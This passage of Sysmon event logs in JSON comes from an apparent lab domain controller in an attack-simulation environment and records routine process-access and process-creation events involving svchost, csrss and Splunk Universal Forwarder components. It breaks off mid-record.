{"EventTime":"2020-08-01 08:02:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6272,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:40.695\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:40.695","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6273,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:40.695\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21A0-5F25-0000-0010C5970900}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:40.695","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21A0-5F25-0000-0010C5970900}","TargetProcessId":"4368","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6274,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.399\r\nProcessGuid: {41C8662E-21A1-5F25-0000-00107D990900}\r\nProcessId: 2468\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.399","ProcessGuid":"{41C8662E-21A1-5F25-0000-00107D990900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6275,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.398\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21A1-5F25-0000-00107D990900}\r\nTargetProcessId: 2468\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.398","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21A1-5F25-0000-00107D990900}","TargetProcessId":"2468","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6276,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.398\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21A1-5F25-0000-00107D990900}\r\nTargetProcessId: 2468\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.398","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21A1-5F25-0000-00107D990900}","TargetProcessId":"2468","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6277,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6278,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6279,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6280,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 